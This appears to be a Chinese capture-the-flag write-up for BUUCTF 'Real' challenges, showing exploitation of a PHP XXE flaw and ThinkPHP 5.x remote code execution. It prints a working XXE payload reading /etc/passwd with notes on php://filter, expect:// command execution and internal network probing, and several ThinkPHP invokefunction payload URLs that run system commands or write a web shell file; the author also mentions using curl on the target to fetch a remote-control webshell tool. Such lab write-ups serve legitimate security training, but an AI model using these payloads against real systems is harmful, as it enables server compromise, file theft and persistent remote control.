BUUCTF-Real
BUUCTF-Real
- [PHP]XXE
- [ThinkPHP]5-Rce
- [ThinkPHP]5.0.23-Rce
- [ThinkPHP]2-Rce
- Log4j
- [log4j]CVE-2017-5645
- [Flask]SSTI
- 未完待续
[PHP]XXE
PHP 7.0.30 libxml 2.8.0
libxml2.9.0以后,默认不解析外部实体,导致XXE漏洞逐渐消亡。为了演示PHP环境下的XXE漏洞,本例会将libxml2.8.0版本编译进PHP中。
Web目录为./www,其中包含4个文件:
$ tree .
├── dom.php # 示例:使用DOMDocument解析body
├── index.php
├── SimpleXMLElement.php # 示例:使用SimpleXMLElement类解析body
└── simplexml_load_string.php # 示例:使用simplexml_load_string函数解析body
dom.php、SimpleXMLElement.php、simplexml_load_string.php均可触发XXE漏洞
利用代码
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root>
<name>&xxe;</name>
</root>/*
1.读取任意文件
file 协议,file:///etc//passwd
php 协议,php://filter/read=convert.base64-encode/resource=index.php
2.执行系统命令
PHP环境中PHP的expect模块被加载
expect://ipconfig
3.内网探测
http://192.168.0.128:80
参见:https://xz.aliyun.com/t/3357#toc-11
*/
利用如下
一篇文章带你深入理解漏洞之 XXE 漏洞
所以要想更进一步的利用我们不能将眼光局限于 file 协议,我们必须清楚地知道在何种平台,我们能用何种协议
如图所示:
PHP在安装扩展以后还能支持的协议:
如图所示:
注意:
1.其中从2012年9月开始,Oracle JDK版本中删除了对gopher方案的支持,后来又支持的版本是 Oracle JDK 1.7
update 7 和 Oracle JDK 1.6 update 35
2.libxml 是 PHP 的 xml 支持
[ThinkPHP]5-Rce
大佬博客走起
以下是其博客POC
************Thinkphp = 5.1.x , php版本>5.5http://127.0.0.1/index.php?s=index/think\request/input?data[]=phpinfo()&filter=asserthttp://127.0.0.1/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()http://127.0.0.1/index.php?s=index/\think\template\driver\file/write?cacheFile=shell.php&content=<?php%20phpinfo();?>************Thinkphp = 5.0.x , php版本>=5.4http://127.0.0.1/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()但是buuctf靶机不能通过上面5.0.x的POC,猜测是其assert函数被禁止或者其他问题
本次buuctf的poc 其版本为5.0.20
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
有命令执行我就喜欢远控,发现该靶机有curl命令且可以通外网,那就下载一个蚁剑
BUUCTF-Real相关推荐
- BUUCTF的Web真题学习整理(一)
目录 WEB1-WarmUp (任意文件包含漏洞) WEB2-高明的黑客(fuzz脚本) WEB3-easy_tornado (服务端模板注入(ssti攻击)) WEB4-Hack World(时间盲 ...
- BUUCTF寒假刷题-Web
前言 寒假横向刷题(尽量) BUUCTF
- BUUCTF之[Zer0pts2020]Can you guess it? basename函数绕过
BUUCTF之[Zer0pts2020]Can you guess it? basename函数绕过 题目 后台PHP源码: <?php include 'config.php'; // FLA ...
- BUUCTF刷题笔记
BUUCTF刷题笔记 [极客大挑战 2019]BabySQL 从这句话我们可以看出,这个网站的后台是做了过滤处理的 这个时候我们先用万能密码实验一下看看,是什么类型的SQL注入 输入1',看看返回的结 ...
- BUUCTF Quoted-printable编码
Quoted-printable可译为"可打印字符引用编码",编码常用在电子邮件中,如:Content-Transfer-Encoding: quoted-printable ,它 ...
- BUUCTF NewStarCTF一些新知识记录
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 目录 前言 一.eazyxor 二.RSA_begin 三.Yesec no drumsticks 四.EzSnake 五.Pyre ...
- buuctf Mark loves cat
buuctf Mark loves cat 打开是个静态页面,源码也无任何有用信息 dirsearch扫描后发现.git泄露 GitHack.py下载得到两个php文件,接下来就是代码审计: flag ...
- BUUCTF·[MRCTF2020]天干地支+甲子·WP
题目来源 BUUCTF在线评测 (buuoj.cn) 附件 得到得字符串用MRCTF{}包裹 一天Eki收到了一封来自Sndav的信,但是他有点迷希望您来解决一下 甲戌 甲寅 甲寅 癸卯 己酉 甲寅 ...
- BUUCTF Reverse/findKey
BUUCTF Reverse/findKey 先看文件信息:32位程序,没有加壳 打开看看,标题为find flag,也没啥有用的信息 IDA32位打开,找到start函数,看到有个main,跟随跳转 ...
- BUUCTF中web方向题目记录(二)
双写绕过 BUUCTF[极客大挑战 2019]BabySQL 好像和前面的题目相似 check.php?username=admin&password=1' 单引号闭合 check.php?u ...
最新文章
- @2021 高考生,用 Python 分析专业“钱景”
- [J2SE 基础知识]2、抽象类和接口(上)
- asp.net性能常用优化
- 好用!目前用下来最溜的MacOS微信多开工具!
- python自学流程-各个阶段的python学习路线?
- Java学习笔记3——继承
- 猫猫学iOS之小知识iOS启动动画_Launch Screen的运用
- Python动态变量名定义与调用
- Java通过引用操作对象的“共享”特性
- 如何解决GBK的编码的文件中的中文转换成为UTF-8编码的文件而且不乱码
- 二十一世纪科学和数学的趋势
- python 网络监控系统手机版下载_云视通网络监控系统手机版下载_云视通下载手机版-太平洋下载中心...
- 百人研发团队的难题:研发管理、绩效考核、组织文化和OKR
- 【Angular中的RxJS】- Subject 分类介绍
- 为什么正经程序员不写注释?
- Android Camera HAL3 - MultiCamera-HALBufferManager
- Unity发布windows程序,Fullscreen Mode设置为Windowed,可运行总是全屏
- 巧用快捷键轻松设置Eexel单元格格式(转)
- 使用 BEV 投影的高效城市规模点云分割
- 构建器builder模式 + lombok @Builder的介绍及使用
热门文章
- 71页智慧工地整体解决方案
- 《Spring源码深度解析 郝佳 第2版》ApplicationContext
- Chisel教程——03.Chisel中的组合逻辑(结尾附上Chisel3 Cheat Sheet)
- ubuntu 安装 chisel
- LVGL 之 windows 上 lvgl 模拟器基于 Visual Studio 搭建方法的简单整理
- SSL 2382 k好数(数位dp)
- 交大网络计算机第二学期,交大网络计算机作业.docx
- 湖北9月计算机二级报名时间,[最新]云南省湖北省2019年9月全国计算机二级报名时间公布...
- element el-table(:render-header)实现动态表头的自适应
- 堡垒机连接跳板机提示账号密码错误NLA or TLS ....